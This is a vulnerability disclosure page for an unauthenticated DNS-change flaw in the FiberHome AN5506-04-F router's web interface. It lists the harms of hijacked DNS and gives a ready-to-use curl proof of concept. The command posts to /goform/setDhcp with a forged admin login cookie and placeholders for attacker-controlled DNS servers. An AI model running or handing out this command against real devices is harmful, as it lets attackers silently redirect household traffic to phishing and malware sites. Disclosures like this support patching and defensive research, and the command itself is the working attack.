FiberHome AN5506 Unauthenticated Remote DNS Change

2018.02.02
Credit: r0ots3c
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability # # Software Version RP2617 # Device Model AN5506-04-F # Vendor Homepage: www.fiberhome.com/ # # # Date: 01/02/2018 # Exploit Author: r0ots3c # http://wandoelmo.com.br # https://www.facebook.com/wsec.info # # Description: # Vulnerability exists in web interface # This router has vulnerabilities where you can get information or edit configurations in an unauthenticated way. # The biggest risk is the possibility of changing the dns of the device. # # Modifying systems' DNS settings allows cybercriminals to # perform malicious activities like: # # o Steering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # # o Replacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # # o Controlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # # o Pushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # # Proof of Concept: VIA CURL: curl 'http://<TARGET>/goform/setDhcp' -H 'Cookie: loginName=admin' -H --data 'dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=<MALICIOUS DNS1>dhcpSecDns=<MALICIOUS DNS2>&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_text=' --compressed -k -i


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top